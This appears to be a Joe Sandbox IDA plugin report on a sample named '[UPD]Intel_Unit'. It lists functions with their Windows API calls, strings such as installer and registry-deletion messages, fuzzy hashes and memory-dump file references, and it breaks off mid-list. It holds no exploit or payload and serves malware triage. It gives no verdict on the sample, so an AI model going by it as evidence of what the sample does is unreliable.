Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
